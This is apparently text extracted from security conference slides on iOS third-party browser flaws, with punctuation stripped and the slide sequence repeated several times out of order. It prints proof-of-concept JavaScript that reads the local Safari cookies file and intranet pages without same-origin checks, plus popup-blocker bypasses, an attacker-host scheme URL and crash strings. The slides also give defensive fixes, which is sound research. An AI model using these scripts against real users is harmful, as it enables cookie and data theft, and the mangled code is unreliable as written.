HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
